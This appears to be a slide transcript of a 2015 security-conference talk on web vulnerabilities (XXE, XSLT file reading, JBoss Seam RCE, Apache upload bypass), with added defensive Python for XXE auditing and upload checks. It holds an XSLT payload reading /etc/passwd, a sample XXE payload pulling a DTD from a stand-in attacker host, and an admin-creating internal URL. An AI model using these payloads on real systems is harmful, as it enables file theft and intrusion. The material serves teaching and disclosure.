Speaker: Michał Sajdak
Language: English
I will show (live demos!) several web vulnerabilities: the first public disclosure of critical bugs in the Nuxeo platform, RCE in XSLT transformation, non-standard path traversal examples, problems when processing XML files, and unusual problems with file upload.
During the presentation you will have a chance to win a bottle of wine (received as a bug bounty for reporting the issues to the Nuxeo team).
CONFidence: http://confidence.org.pl/pl/
CONFidence 2015: Unusual security problems in web applications - Michał Sajdak
1. Unusual security problems in web applications.
Michał Sajdak, CISSP, CEH, F2B
securitum.pl
sekurak.pl
rozwal.to
2. About me
Michał Sajdak <at> securitum.pl
Pentester
Instructor (security trainings)
sekurak.pl founder
rozwal.to founder
2
Copyright 2014 Securitum
www.securitum.pl
3. Agenda
Vulnerabilities in Nuxeo
First public disclosure
(Maybe?) not so obvious path traversal(s)
OS code exec
XXE
JBoss Seam nice RCE
RCE through XSLT transformation (if we have time)
PHP shell upload – filter bypassing (if we have time)
Educational use only
5. Nuxeo
The RPM (Release and Preservation Management) Department at EA uses the Nuxeo Platform to manage video game builds at all stages of the development lifecycle.
Using the Nuxeo Platform as a core server, Jeppesen, a Boeing company, syncs flight bag information to iPads for pilots across the world.
6. Nuxeo
The Nuxeo Platform, offering strong support for SSO, along with a flexible content management platform, is the perfect addition to the US Navy’s application portfolio.
Orange manages communication with its mobile telecommunications and broadband internet provider clients through a secure extranet portal built on the Nuxeo Platform.
7. Nuxeo
History
Bug patched this year (February)
Reported by Michal Bentkowski & Sebastian Gilon from securitum.pl
https://doc.nuxeo.com/display/ADMINDOC/Nuxeo+Security+Update+-+2015-02-27+-+Critical
No details disclosed
DEMO
8. Nuxeo – reporting history
Securitum:
Hey, you got some nasty bugs in your platform. Here are the details.
Nuxeo:
Cool, these are definitely nice bugs! We’ll prepare a patch soon!
BTW: do you want something for reporting the bug?
Securitum:
no :-)
Nuxeo:
Do you drink from time to time?
Securitum:
Sometimes :P
Nuxeo:
Cool, we are sending 2 crates of wine to Poland
10. XXE (XML eXternal Entities)
XXE has been known for a while
But many, many applications are vulnerable by default
BTW: XXE tests are available only in the latest versions of Burp Suite (a very popular web pentesting tool)
11. XXE (XML eXternal Entities)
HTML entities
&lt; or <
&lt;
&quot;
&apos;
&amp;
&micro;
…
Or:
&entity_name;
&#entity_number;
16. XXE (XML eXternal Entities)
Can we only read files?
No :P
Making HTTP requests
Transferring files to your server (blind XXE)
Making requests to 127.0.0.1
Some of these are unauthenticated?
Scanning backend infrastructure
Services with no auth check, etc.
http://10.0.0.75:8080/usrMgmt/add/admin2/admin2
17. XXE (XML eXternal Entities)
Actually we can often exploit XXE even when no tag is displayed (!), i.e. as soon as the XML parser starts.
Parameter entities
They can be used only in the DOCTYPE:
<!ENTITY % name "entity_value">
19. XXE (XML eXternal Entities)
Can we only read files?
No :P
Making HTTP requests
Transferring files to your server (blind XXE)
The firewall must allow outgoing HTTP communication
Making requests to 127.0.0.1
Some of these are unauthenticated?
Scanning backend infrastructure
Services with no auth check, etc.
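An added example (not from the talk) of the defender's side of the parameter-entity and blind-XXE points above: a Python audit that uses the standard-library expat parser to record every DOCTYPE and entity declaration, refuses to resolve any external reference, and rejects any document that carries a DOCTYPE at all. The sample payload and the attacker.invalid host are constructed for this example.

```python
import xml.parsers.expat as expat

# Constructed sample: a DOCTYPE declaring a parameter entity that points at a remote DTD
# (the blind-XXE shape) and a general entity that points at a local file.
SAMPLE_XXE = b"""<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY % remote SYSTEM "http://attacker.invalid/evil.dtd">
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<doc>&file;</doc>"""

SAMPLE_CLEAN = b"<doc><user>alice</user></doc>"


def audit_xml(data: bytes) -> dict:
    """Parse with expat, recording the DOCTYPE and every entity declaration, and
    abort instead of resolving external references. Nothing is read from disk or
    the network: expat never fetches on its own and our handler refuses to."""
    report = {"doctype": False, "general": [], "parameter": [], "external": []}
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = True
        if sysid or pubid:  # external DTD reference on the DOCTYPE itself
            report["external"].append(("DOCTYPE", sysid))

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # is_param is set for "<!ENTITY % name ...>" declarations
        report["parameter" if is_param else "general"].append(name)
        if sysid is not None or pubid is not None:
            report["external"].append((name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        report["external"].append((context, sysid))
        return 0  # a false return makes expat abort the parse

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass  # the abort above surfaces as a parse error; the report is complete
    return report


def accept_xml(data: bytes) -> bool:
    """Policy that closes the whole class: refuse any document carrying a DOCTYPE."""
    return not audit_xml(data)["doctype"]
```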
22. XSLT
Commonly used for custom styling in web apps
XML (DB generated) + XSLT (user provided styles)
= nice HTML
= nice PDF
etc.
24. XSLT
We can have a problem when a user (i.e. an attacker) can provide an XSL file to be parsed on the server side
Example: custom desktop in a web app
Example: print templates
…
26. XSLT
PHP
Doesn’t work by default…
But reading files does:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<!-- user-supplied stylesheet: document() pulls a server-side file into the output -->
<xsl:template match="/">
<xsl:copy-of select="document('/etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
27. OS Command Exec – JBoss Seam
An example of the following problem:
We deploy an app which uses library X
After some time… vulnerabilities are found in the used lib
Info: Meder Kydyraliev, Seam Vulnerability, http://blog.o0o.nu/
28. OS Command Exec – JBoss Seam
There is a vulnerability in JBoss Seam which allows you to execute OS code
No auth needed
No specific condition needed
The only requirement: the app is using the vulnerable version of the lib
DEMO
29. Upload / Apache – filter bypassing
Commonly used methods:
File extension blacklisting
i.e.: no .php / .jsp / etc. can be uploaded
Checking file structure
i.e.: is the uploaded file a real image / PDF / etc.
30. Upload / Apache – filter bypassing
Interesting fact
How many Apache servers will interpret the following file:
test.jpg.php.wnk2j3.tralalala.sekurak
as txt?
as php?
as jpg?
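An added example, not part of the talk, modelling the quiz above in Python: with an AddHandler-style configuration, Apache's mod_mime treats every dot-separated segment after the base name as an extension candidate, so a blacklist that only inspects the last extension accepts the file while the .php segment still selects the handler. The hardened check whitelists exactly one extension and stores the file under a random name; the extension lists are assumptions for the example.

```python
import re
import secrets

# Assumed lists for this example; align them with the server's real AddHandler config.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "jsp", "jspx", "cgi", "pl", "sh"}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}


def blacklist_last_extension(filename: str) -> bool:
    """The weak check from the slide: only the final extension is compared.
    Returns True when the upload would be accepted."""
    last = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return last not in SCRIPT_EXTENSIONS


def handler_extensions(filename: str) -> list:
    """Model of mod_mime with AddHandler: every segment after the base name is an
    extension candidate and unknown segments are ignored, so a script extension
    anywhere in the name is enough for the handler to be selected."""
    segments = filename.lower().split(".")[1:]
    return [s for s in segments if s in SCRIPT_EXTENSIONS]


# Base name of safe characters, then exactly one short extension; no slashes, no extra dots.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def whitelist_single_extension(filename: str) -> bool:
    """Hardened check: no path separators, exactly one extension, and it is allowed."""
    m = _SAFE_NAME.fullmatch(filename)
    return bool(m) and m.group(1).lower() in ALLOWED_EXTENSIONS


def storage_name(filename: str) -> str:
    """Never keep the client's name: store under a random name with the validated extension."""
    if not whitelist_single_extension(filename):
        raise ValueError("rejected upload name: %r" % filename)
    return secrets.token_hex(16) + "." + filename.rsplit(".", 1)[1].lower()
```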
32. What’s next?
DotNetNuke – full unauthenticated admin
TP-Link devices
Two new methods for gaining OS root
One is sort of universal – works in old and new devices
Disclosure on sekurak.pl ~soon